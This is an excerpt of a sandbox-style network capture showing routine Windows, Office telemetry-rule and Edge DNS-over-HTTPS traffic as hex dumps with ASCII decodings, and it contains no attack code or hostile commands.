2024-11-13 19:39:43 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-13 19:39:43 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 4c 43 69 43 64 58 39 61 30 6d 6d 35 65 73 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 63 30 33 39 30 36 31 62 65 65 34 62 34 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 4e 31 50 6f 47 59 2f 6d 42 65 45 67 6f 38 6a 67 58 38 64 68 62 49 74 51 68 6a 52 4a 36 70 56 4c 48 32 38 35 41 6f 79 46 68 4c 67 71 78 51 53 62 63 72 6b 44 38 77 6b 67 39 5a 4c 49 44 35 52 69 4f 30 5a 6d 46 6e 32 4c 74 46 39 39 6c 31 4b 53 30 46 53 6b 55 55 39 34 6a 39 67 6d 7a 4d 4f 70 59 56 71 54 51 67 6d 48 42 39 54 31 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: nLCiCdX9a0mm5esR.2Context: 8cc039061bee4b47<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAfN1PoGY/mBeEgo8jgX8dhbItQhjRJ6pVLH285AoyFhLgqxQSbcrkD8wkg9ZLID5RiO0ZmFn2LtF99l1KS0FSkUU94j9gmzMOpYVqTQgmHB9T1
2024-11-13 19:39:43 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 6e 4c 43 69 43 64 58 39 61 30 6d 6d 35 65 73 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 63 30 33 39 30 36 31 62 65 65 34 62 34 37 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: nLCiCdX9a0mm5esR.3Context: 8cc039061bee4b47
2024-11-13 19:39:43 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-13 19:39:43 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 52 54 4d 44 53 72 62 2f 72 30 65 31 70 70 52 35 6a 70 71 6e 30 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: RTMDSrb/r0e1ppR5jpqn0Q.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.5	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 7accfaa7-701e-0032-50a0-34a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-r178fb8d765hbcjvhC1DFW50zc00000001d000000000sh4q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:43 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-16547b76f7f7scqbhC1DFW0m5w0000000ha000000000zhbw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:43 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: cfdde913-301e-006e-42a1-34f018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193943Z-1749fc9bdbdnkwnnhC1DFWud0400000001bg00000000mxx6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.5	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:43 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-16547b76f7fvllnfhC1DFWxkg80000000hk000000000rzxy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	49896	172.64.41.3	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-13 19:39:44 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-13 19:39:44 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e213ac26f352e4e-DFW alt-svc: h3=":443"; ma=86400
2024-11-13 19:39:44 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 15 00 04 8e fa 73 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcoms^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	49897	162.159.61.3	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-13 19:39:44 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-13 19:39:44 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e213ac26bd52e24-DFW alt-svc: h3=":443"; ma=86400
2024-11-13 19:39:44 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 81 00 04 8e fa 72 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomr^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	49895	162.159.61.3	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-13 19:39:44 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-13 19:39:44 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e213ac27caf4780-DFW alt-svc: h3=":443"; ma=86400
2024-11-13 19:39:44 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ae 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomq^)

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.5	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-16547b76f7fdtmzhhC1DFW6zhc00000006b000000000z096 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.5	49900	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-16547b76f7frbg6bhC1DFWr5400000000hdg00000000vxaa x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 933b88d1-c01e-0079-80a0-34e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-r178fb8d765tq2dphC1DFW278s00000001c000000000amw3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
